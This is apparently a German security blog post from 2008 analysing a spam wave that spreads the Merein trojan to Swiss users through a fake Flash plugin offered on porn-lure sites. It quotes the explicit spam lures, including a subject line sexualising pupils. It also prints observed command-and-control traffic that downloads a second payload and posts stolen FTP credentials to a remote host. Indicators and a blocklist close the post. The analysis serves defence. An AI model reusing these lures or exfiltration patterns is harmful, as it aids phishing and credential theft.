Seit dem frühen Morgen verbreitet sich der Trojaner Merein (TrendMicro / Sophos) über eine Spam-Welle, welche auf Schweizer Benutzer abzielt. Der E-Mail Text sowie der Betreff ist jeweils auf deutsch verfasst:
Betreff: Blasen mit Madonna
Die erste Seite in der Schweiz, wo es Promis vor der Kamera treiben! Die junge Madonna mit einem prallen Schwengel im Mund oder die skandalösen Clips mit Britney Spears beim Sexspiel vor laufender Kamera! Aber auch Stars aus der Schweiz sind dabei! Und eine ganze Menge davon! Nur bei uns! HEISSE VIDEOS MIT PROMIS!
http://www.schoolswitzerland.com
Betreff sowie die angegebene URL im E-Mail Text variieren.
Domains:
schoolswitzerland.com (115.126.2.160)
switzerlandgirl.eu (115.126.2.160)
switzerlandpussy.eu (115.126.2.160)
Betreff:
Britney Spears vor der Pornokamera – Skandal!
Promiporn
Blasen mit Gillian Anderson – Video
Junge Portugiesinnen brennen vor Verlangen
Blasen mit Madonna
Bumsen und Blasen in heissen portugiesischen Stadten
Stars gehen am Pornohimmel auf
Der Empfänger der E-Mail wird dazu verleitet, auf den im Spam-Mail angegebenen Link zu klicken. Die Webseite nennt sich PornTube und beinhaltet angeblich pornografisches Material. Wird auf ein Bild auf der Webseite geklickt, wird der Besucher dazu aufgefordert, ein Adobe Flash Player HD Plugin zu installieren um den Inhalt anschauen zu können:
Klickt der Besucher auf CLICK HERE TO DOWNLOAD THE FULL VIDEO ADOBE FLASH PLAYER HD PLUGIN, bekommt er die ausführbare Datei patch_downloader.exe. Die Datei beinhaltet einen Trojaner namens Merein (TrendMicro / Sophos):
Filename: patch_downloader.exe
File size: 5436 bytes
MD5…: 21cefa95951a4c0a5d96be750d9a5f3c
SHA1..: f5cb1cd9211f79fe819d9d82a0a536c2ac7a014a
Erkennungsrate: 21/38 (55.26%)
Wird die Datei patch_downloader.exe ausgeführt, installiert sich der Trojaner auf das System:
C:\WINDOWS\9129837.exe
C:\WINDOWS\new_drv.sys
Als erstes bekommt der Benutzer die Meldung Please, restart your browser!. Im Hintergrund kontaktiert der Trojaner bereits einen C&C Server (hot-sexpt.com 115.126.2.160):
GET hot-sexpt.com/sutra/in.cgi?2
Dabei bekommt der installierte Trojaner die Anweisung vom C&C Server weiteren Schadcode herunter zu laden:
HTTP/1.1 302 Found
Location: http://hot-sexpt.com/305.exe
Transfer-Encoding: chunked
Content-Type: text/html
document moved http://hot-sexpt.com/305.exe
Die Datei 305.exe enthält wiederum einen Trojaner:
Filename: 305.exe
File size: 53248 bytes
MD5…: c3c151386dc4b4d3495bffac9344dc80
SHA1..: 9d72c08500aee50a84c9781dbe09c328812c6ffe
Erkennungsrate: 3/38 (7.89%)
Danach meldet sich der Trojaner bei einem weiteren Server (empresalda.com 91.203.92.103):
POST http://empresalda.com/cgi-bin/pstore.cgi
Und wieder einmal zeigen die Spuren zur UATelecom (91.203.92.103, siehe frühere Posts).
Hat sich der Trojaner einmal eingenistet, versucht dieser FTP-Logins mit zu schneiden und die Zugangsdaten zu stehen:
POST empresalda.com/cgi-bin/forms.cgi HTTP/1.1
URL: sniffer_ftp_***.ch
ftp_server=ftp.****.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0
Fazit
Den Empfängern solcher E-Mails wird dringen angeraten, das E-Mail unverzüglich zu löschen und auf keinen Fall das auf den Webseiten angepriesene Adobe Plugin herunter zu laden. Unternehmen sollten es des Weiteren in Betracht ziehen, folgende Domains bzw. IP-Adressen an den zentralen Gateways zu blockieren:
91.203.92.103 (UATelecom)
115.126.2.160 (First Network Communications Hong Kong)
schoolswitzerland.com
switzerlandgirl.eu
switzerlandpussy.eu
hot-sexpt.com
empresalda.com
UPDATE 10:45 Uhr
Es handelt sich um den selben Trojaner, welche bereits am 25. Oktober 2008 in den USA gesichtet wurde (Siehe Post Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins). Auch diesmal stiehlt der Trojaner nicht nur FTP Zugangsdaten sondern auch diejenigen, welche über HTTP / HTTPS übertragen werden (z.B. beim OnlineBanking).
UPDATE 20:04 Uhr
Die Melde- und Analysestelle Informationssicherung (MELANI) hat heute Nachmittag noch eine entsprechende Information herausgegeben:
Information: E-Mail-Welle mit dem Ziel, Schweizer Computer zu infizieren
UPDATE 12. Dezember 2008
Die Spam-Welle scheint nicht abzuklingen. Auch in den letzten Tagen wurde massenweise solcher Spam-Mails verschickt. Hier noch ein exemplar:
Hallo! Wir sind absolut neu! Und nur für Dich! Du findest uns im Netz unter der Adresse … Bei uns findest Du Videos und heiße Bilder für jeden Geschmack, auch Hardcore, Natursekt, Sodomie und vieles andere mehr! Absolut geil! Lass Deiner Phantasie freien Lauf! Auch Pornoklassiker aus den 70ern und 80ern, jede Menge! Komm rein und leg los! Dem Download sind keine Grenzen gesetzt!
http://www.sexswitzerland.eu
Betreff:
Ficken ohne Grenzen
Videos – nur das Beste!
Die erste offizielle und kostenlose Pornoseite in der Schweiz
Das beste an Prono im Schweizer Internet
Das wahnsinnige Blaskonzert
Die beste Sammlung von Pornofilmen
Geile Filme fur jeden perversen Geschmack
Schuler in Schweizer Schulen besorgen es sich selbst und in der Gruppe
Weiter domains, welche derzeit aktiv den Trojaner verbreiten:
sexswitzerland.eu (115.126.2.160)
bigporno.eu (115.126.2.160)
fuckanal.eu (115.126.2.160)
bigpornosex.eu (115.126.2.160)